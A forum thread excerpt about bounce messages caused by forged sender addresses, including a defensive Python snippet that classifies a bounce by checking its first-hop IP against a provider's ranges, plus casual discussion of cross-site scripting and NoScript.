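A way to check the "faked sender, bounces but no sent items" pattern from two posts up against the "delivery failure notice not from my IP" point in the list above: pull the originating IP out of the headers a bounce embeds and see whether it falls inside the webmail provider's own outbound ranges. This is an added example, not code from the thread; the bounce message, hosts, IPs and the provider ranges are all constructed placeholders.

```python
import email
import ipaddress
import re
from email import policy

# Constructed sample bounce (NDR). The rejecting server attaches the headers of the
# message it refused; every address, host name and IP below is made up for illustration.
SAMPLE_NDR = """\
From: MAILER-DAEMON@mx.example.org
To: victim@webmail.example
Subject: Delivery Status Notification (Failure)
Content-Type: multipart/report; report-type=delivery-status; boundary="b1"

--b1
Content-Type: text/rfc822-headers

Received: from mx.example.org (mx.example.org [198.51.100.9]) by inbound.example.org
Received: from unknown (HELO smtp.webmail.example) (203.0.113.77) by mx.example.org
From: victim@webmail.example
To: dead@example.org
Subject: check this out
--b1--
"""

# Outbound relay ranges the webmail provider really uses (assumed here; in practice take
# them from the provider's published SPF record or its documentation).
PROVIDER_NETS = ["192.0.2.0/24"]

IP_RE = re.compile(r"[\[(](\d{1,3}(?:\.\d{1,3}){3})[\])]")

def first_hop_ip(headers_text):
    """IP in the earliest Received header (the last one listed, added by the first relay).
    Only headers added by servers you trust are reliable; here that is the recipient's MX,
    which recorded the address that actually connected to it."""
    received = [l for l in headers_text.splitlines() if l.lower().startswith("received:")]
    match = IP_RE.search(received[-1]) if received else None
    return match.group(1) if match else None

def classify_bounce(raw_ndr, provider_nets=PROVIDER_NETS):
    """Did the bounced original leave through the provider, or was the sender forged elsewhere?"""
    nets = [ipaddress.ip_network(n) for n in provider_nets]
    msg = email.message_from_string(raw_ndr, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/rfc822-headers":
            ip = first_hop_ip(part.get_content())
            if ip is None:
                return ("no_received_headers", None)
            inside = any(ipaddress.ip_address(ip) in net for net in nets)
            return ("sent_via_provider" if inside else "forged_elsewhere", ip)
    return ("no_original_headers", None)
```

A "forged_elsewhere" verdict matches the thread's reading: the message never passed through the account's own provider, so nothing on the account holder's machine needs to have sent it.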
-
I didn't think it was a rootkit either but didn't want to speculate.
Could someone explain this web mail address book nicking in more detail? First I've ever heard of it. Would the javascript in the email be hosted on the web mail server or a 3rd party server? i.e. is Firefox with NoScript protecting me or not?
-
http://en.wikipedia.org/wiki/Cross-site_scripting
XSS being based on JavaScript code executed in the user's browser, disabling JavaScript in your browser should prevent the problem - theoretically at least.
-
Cheers! Didn't know cross site scripting could nick address books; I thought it was just for inserting fake login boxes on legit sites (or was that SQL injection?)
NoScript will be protecting me :D
On my Google Chrome suggestion earlier, I think Firefox + NoScript is probably more secure, but it isn't for typical web users, more for control freak nerds